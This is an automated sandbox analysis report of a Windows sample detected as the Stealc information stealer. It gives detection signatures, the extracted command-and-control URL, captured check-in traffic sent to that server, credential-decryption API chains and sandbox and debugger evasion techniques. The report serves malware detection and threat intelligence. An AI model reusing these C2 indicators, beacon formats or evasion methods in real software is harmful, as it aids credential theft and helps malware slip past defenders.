Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523652
MD5:7c170238c3fdf496e5420134b8f2c1e6
SHA1:45c78f3c1f17a5cb39fe957ee144b69c6fc81211
SHA256:33cbd0e0fa5ac49cb28c3f095077c7b82cc6127d78a0024eff5e5d9f3fc12029
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7C170238C3FDF496E5420134B8F2C1E6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6200JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6200JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ff0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T22:16:04.772466+020020442431Malware Command and Control Activity Detected192.168.2.649710185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.ff0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 50%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00FFC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FF9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FF7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FF9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01008EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_01008EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_01004910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_010038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FFDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_01004570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FFE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FFED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FFF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FFBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FFDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01003EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_01003EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 36 41 31 32 44 31 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="hwid"D596A12D1E9E487256326------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="build"doma------KFBGDBFBKKJECBFHDGIE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FF4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 36 41 31 32 44 31 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="hwid"D596A12D1E9E487256326------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="build"doma------KFBGDBFBKKJECBFHDGIE--
                Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/Zg
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpSg
                Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37t=

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124F86C NtOpenThread,0_2_0124F86C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AF1780_2_013AF178
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C49940_2_013C4994
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013449F60_2_013449F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013CD3CC0_2_013CD3CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C93C30_2_013C93C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01492AE80_2_01492AE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BDAF00_2_013BDAF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C6ACD0_2_013C6ACD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C85BA0_2_013C85BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013CADF20_2_013CADF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BA46F0_2_013BA46F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01275F3D0_2_01275F3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C0F200_2_013C0F20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012EF67F0_2_012EF67F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130FE680_2_0130FE68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BFE860_2_013BFE86
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FF45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: egzmbzjx ZLIB complexity 0.9948495546589525
                Source: file.exe, 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_01009600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01003720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_01003720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\H6YIDDNH.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 50%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1838080 > 1048576
                Source: file.exeStatic PE information: Raw size of egzmbzjx is bigger than: 0x100000 < 0x19a800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;egzmbzjx:EW;cqfrfmzh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;egzmbzjx:EW;cqfrfmzh:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01009860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c7576 should be: 0x1d08cf
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: egzmbzjx
                Source: file.exeStatic PE information: section name: cqfrfmzh
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0146A157 push 4D0B5202h; mov dword ptr [esp], eax0_2_0146A29C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01493154 push ebx; mov dword ptr [esp], esi0_2_014931CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01493154 push 709336C0h; mov dword ptr [esp], esp0_2_0149321F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AF178 push eax; mov dword ptr [esp], ecx0_2_013AF18A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AF178 push ecx; mov dword ptr [esp], eax0_2_013AF296
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AF178 push eax; mov dword ptr [esp], edi0_2_013AF3B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0145210D push 197D5D01h; mov dword ptr [esp], ebp0_2_01452164
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D9972 push esi; mov dword ptr [esp], eax0_2_013D99C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D9972 push 3EC1C654h; mov dword ptr [esp], ebp0_2_013D9A6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D9972 push ebx; mov dword ptr [esp], 65DE6C6Eh0_2_013D9AE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01342964 push 09651C1Dh; mov dword ptr [esp], edi0_2_013429AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01342964 push eax; mov dword ptr [esp], ebx0_2_013429B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01400123 push edi; mov dword ptr [esp], 1B55F994h0_2_01400145
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014C79C6 push 660EB7F4h; mov dword ptr [esp], ebx0_2_014C7A57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014B71E3 push 5DE817ECh; mov dword ptr [esp], ebp0_2_014B7D59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push ebp; mov dword ptr [esp], edi0_2_013C49AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push ebx; mov dword ptr [esp], ebp0_2_013C49D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 23FF5AADh; mov dword ptr [esp], edx0_2_013C4A4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 7D599704h; mov dword ptr [esp], ecx0_2_013C4A5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push ebp; mov dword ptr [esp], edx0_2_013C4A76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 67B6FF43h; mov dword ptr [esp], ebx0_2_013C4A84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 15D74D4Fh; mov dword ptr [esp], edx0_2_013C4B0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 081B7752h; mov dword ptr [esp], ecx0_2_013C4B32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push edx; mov dword ptr [esp], ecx0_2_013C4B39
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 0CA1FD9Ah; mov dword ptr [esp], eax0_2_013C4BB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push 0843A9B3h; mov dword ptr [esp], esi0_2_013C4BC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push ecx; mov dword ptr [esp], edi0_2_013C4BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push ecx; mov dword ptr [esp], 5ECC1381h0_2_013C4C37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push edx; mov dword ptr [esp], ebp0_2_013C4CCA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push ebx; mov dword ptr [esp], eax0_2_013C4D79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4994 push eax; mov dword ptr [esp], ebx0_2_013C4D9B
                Source: file.exeStatic PE information: section name: egzmbzjx entropy: 7.953232696533616

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01009860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13375
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D26FC second address: 13D2702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2702 second address: 13D2708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D17EF second address: 13D17F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D17F8 second address: 13D17FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1AEE second address: 13D1AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1AFA second address: 13D1AFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2076 second address: 13D2080 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8F347F9F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4643 second address: 13D469F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8F34B47B64h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jne 00007F8F34B47B70h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ebx 0x0000001d push edx 0x0000001e jnl 00007F8F34B47B56h 0x00000024 pop edx 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007F8F34B47B56h 0x00000033 rdtsc
